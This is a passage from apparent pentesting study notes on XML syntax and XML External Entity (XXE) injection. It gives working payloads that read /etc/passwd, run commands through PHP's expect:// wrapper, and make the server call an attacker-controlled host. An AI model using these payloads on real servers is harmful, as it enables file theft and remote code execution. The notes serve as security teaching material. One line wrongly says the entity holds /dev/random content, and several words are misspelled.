 46 | * All elements must have closing tag
 47 | * Tags are case-sensitive
 48 | * XML Attributes must be quotes
 49 | * Special characters must be escaped correctly.
 50 | 
 51 | | &lt; | &lt; | less than |
 52 | | :--- | :--- | :--- |
 53 | | &gt; | &gt; | greater than |
 54 | | & | & | ampersand |
 55 | | ' | ' | apostrophe |
 56 | | " | " | quotation mark |
 57 | 
 58 | * Whitespace is perserved in XML
 59 | 
 60 | ### Attack
 61 | 
 62 | So if an application receives XML to the server the attacker might be able to exploit an XXE. It could be sent as a GET, but it is more likely that it is send in a POST. An attack might look like this:
 63 | 
 64 | ```
 65 | <?xml version="1.0" encoding="ISO-8859-1"?>
 66 |  <!DOCTYPE foo [  
 67 |   <!ELEMENT foo ANY >
 68 |   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
 69 | ```
 70 | 
 71 | The elemet can be whatever, it doesn't matter. The xxe is the "variable" where the content of /dev/random get stored. And by dereferencing it in the foo-tag the content gets outputted.This way an attacker might be able to read files from the local system, like boot.ini or passwd. SYSTEM means that what is to be included can be found locally on the filesystem.
 72 | 
 73 | In php-applications where the expect module is loaded it is possible to get RCE. It is not a very common vulnerability, but still good to know.
 74 | 
 75 | ```
 76 | <?xml version="1.0" encoding="ISO-8859-1"?>
 77 | <!DOCTYPE foo [ <!ELEMENT foo ANY >
 78 | <!ENTITY xxe SYSTEM "expect://id" >]>
 79 | <creds>
 80 |     <user>&xxe;</user>
 81 |     <pass>mypass</pass>
 82 | </creds>
 83 | ```
 84 | 
 85 | Even if the data is not reflected backto the website it is still possible to exfiltrate files and data from the server. The technique is similar to how you exfiltrate the cookie in a Cross-Site Scripting attack, you send it in the url.
 86 | 
 87 | ### Test for it
 88 | 
 89 | * Input is reflected
 90 | 
 91 | ```
 92 | <?xml version="1.0"?><!DOCTYPE Any [<!ENTITY xxe "testdata">]><add>&xxe;</add>
 93 | ```
 94 | 
 95 | If "testdata" gets reflected then it is vulnerable to XXE. If it gets reflected you can try to exfiltrate the data the following way:
 96 | 
 97 | ```
 98 | <!DOCTYPE foo [
 99 | <!ELEMENT foo ANY >
100 | <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
101 | ```
102 | 
103 | Another way to test it is to see if the server tries to download the external script. Firs t you need to set up your own webserver, and then wait for it to connect.
104 | 
105 | ```
106 | <!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://192.168.1.101/fil.txt">]><test>&xxe;</test>
107 | ```
108 | 
109 | ### Exfiltrate data through URL
110 | 
111 | https://blog.bugcrowd.com/advice-from-a-researcher-xxe/
112 | 
113 | ### References
114 | 
115 | [https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/](https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/)
116 | 
117 | [https://blog.bugcrowd.com/advice-from-a-researcher-xxe/](https://blog.bugcrowd.com/advice-from-a-researcher-xxe/)
118 | 
119 | http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
120 | 
121 | 


--------------------------------------------------------------------------------